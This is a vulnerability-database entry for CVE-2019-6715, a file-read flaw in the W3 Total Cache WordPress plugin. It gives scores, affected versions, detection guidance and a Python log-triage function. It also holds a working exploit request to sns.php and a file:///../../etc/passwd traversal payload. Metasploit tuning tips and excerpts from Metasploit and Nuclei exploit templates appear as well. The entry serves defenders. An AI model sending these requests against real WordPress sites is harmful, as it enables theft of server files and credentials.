CVE-2019-6715
Published 2019-04-01
Priority P264 · high · CVSS 3.1: 7.5
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EXPLOIT
EPSS: 19.40% (97.0th percentile)
pub/sns.php in the W3 Total Cache plugin before 0.9.4 for WordPress allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| boldgrid | w3_total_cache | < 0.9.4 | 0.9.4 |
Detection & IOCs (extracted from sources)
Command:

```
PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}
```

- Look for HTTP PUT requests targeting the path /wp-content/plugins/w3-total-cache/pub/sns.php with a JSON body containing 'Type':'SubscriptionConfirmation' and a 'SubscribeURL' field using the file:// scheme (directory traversal) or external URLs (SSRF).
- Detect the JSON payload structure: Type=SubscriptionConfirmation with a SubscribeURL value using the file:// protocol, indicating local file read attempts via directory traversal (e.g., file:///../../etc/passwd).
- Alert on the HTTP PUT method to sns.php in the w3-total-cache plugin directory; this endpoint should not normally receive PUT requests from unauthenticated external sources.
- Match the response body for the base64 string 'TmVzc3VzQ29kZUV4ZWNUZXN0' as a detection indicator for successful SSRF/file-read exploitation in the Nuclei template.
- The Metasploit module's DEPTH parameter controls the number of '../' traversal sequences prepended to the target file path. Default depth is 2; operators should tune this based on the WordPress installation depth relative to the web root.
- Affected versions are W3 Total Cache 0.9.2.6 through 0.9.3 only; version 0.9.4 and above are patched. Verify plugin version via readme before triggering the exploit module.
- The vulnerability is exploitable with web server privileges only; files readable by the web server process are accessible, not necessarily all system files.
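
The request and response checks listed above, combined into one log-triage function. This is an added example, not code from any of the cited sources; the indicator names and the AWS SNS host pattern used to recognise a legitimate SubscribeURL are assumptions, and the sample events are constructed from the strings quoted on this page.

```python
import json
import re
from urllib.parse import urlsplit

SNS_SUFFIX = "/wp-content/plugins/w3-total-cache/pub/sns.php"  # path from the page
NUCLEI_MARKER = "TmVzc3VzQ29kZUV4ZWNUZXN0"  # response string from the page
# Assumption: a genuine SNS confirmation points at an AWS SNS endpoint host.
AWS_SNS_HOST = re.compile(r"^sns\.[a-z0-9-]+\.amazonaws\.com(\.cn)?$")


def classify_sns_request(method, path, body, response_body=""):
    """Return the indicators matched by one request/response pair."""
    if not path.split("?", 1)[0].lower().endswith(SNS_SUFFIX):
        return []
    hits = []
    if method.upper() == "PUT":
        hits.append("put-to-sns-endpoint")
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        doc = None  # non-JSON body: only the method and response checks apply
    if isinstance(doc, dict) and doc.get("Type") == "SubscriptionConfirmation":
        url = doc.get("SubscribeURL")
        if isinstance(url, str):
            try:
                parts = urlsplit(url.strip())
                scheme, host = parts.scheme.lower(), parts.hostname or ""
            except ValueError:  # unparsable URL: treat as not-SNS
                scheme, host = "", ""
            if scheme == "file":
                hits.append("subscribeurl-file-scheme")
            elif not (scheme == "https" and AWS_SNS_HOST.match(host)):
                hits.append("subscribeurl-not-aws-sns")
            if "../" in url or "..\\" in url:
                hits.append("subscribeurl-traversal")
    if NUCLEI_MARKER in response_body:
        hits.append("marker-in-response")
    return hits


# Constructed sample events: (method, path, request body, response body)
_HEAD = '{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"'
SAMPLES = [
    ("PUT", SNS_SUFFIX, _HEAD + 'https://rfi.nessus.org/rfi.txt"}', NUCLEI_MARKER),
    ("PUT", SNS_SUFFIX, _HEAD + 'file:///../../etc/passwd"}', ""),
    ("POST", SNS_SUFFIX, _HEAD + 'https://sns.us-east-1.amazonaws.com/?Action=ConfirmSubscription"}', ""),
]

if __name__ == "__main__":
    for event in SAMPLES:
        print(event[0], classify_sns_request(*event))
```

Most access logs do not record request bodies, so the body checks need WAF, reverse-proxy or packet-capture data; the PUT-to-sns.php check works on plain access logs.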
CVSS provenance
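| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |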
No detection rules found.
Exploit-DB
WordPress Plugin W3 Total Cache - Unauthenticated Arbitrary File Read (Metasploit)
exploitdb · 2020-12-22 · CVSS 7.5 · HIGH
---
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
#
##
class MetasploitModule 'WordPress W3 Total Cache File Read Vulnerability',
      'Description' => %q{
        This module exploits an unauthenticated directory traversal vulnerability
        in WordPress plugin
        'W3 Total Cache' version 0.9.2.6-0.9.3, allowing arbitrary file read with
        the web server privileges.
      },
      'References' =>
        [
          ['CVE', '2019-6715'],
          ['WPVDB', '9248'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-6715'],
          ['URL', 'https://vinhjaxt.github.io/2019/03/cve-2019-6715'],
        ],
      'Author' =>
        [
          'VinhJAXT', # Vulnerability discovery
          'Hoa Nguyen - SunCSR Team' # Metasploit mod
```

Nuclei
W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal
nuclei · CVSS 7.5 · HIGH
WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php.
Template:
```yaml
id: CVE-2019-6715

info:
  name: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal
  author: randomrobbie
  severity: high
  description: |
    WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php.
  impact: |
    An unauthenticated attacker can read sensitive files or traverse directories on the target system, potentially leading to unauthorized access or information disclosure.
  re
```

No writeups or analysis indexed.
- http://packetstormsecurity.com/files/160674/WordPress-W3-Total-Cache-0.9.3-File-Read-Directory-Traversal.html
- https://vinhjaxt.github.io/2019/03/cve-2019-6715
Published: 2019-04-01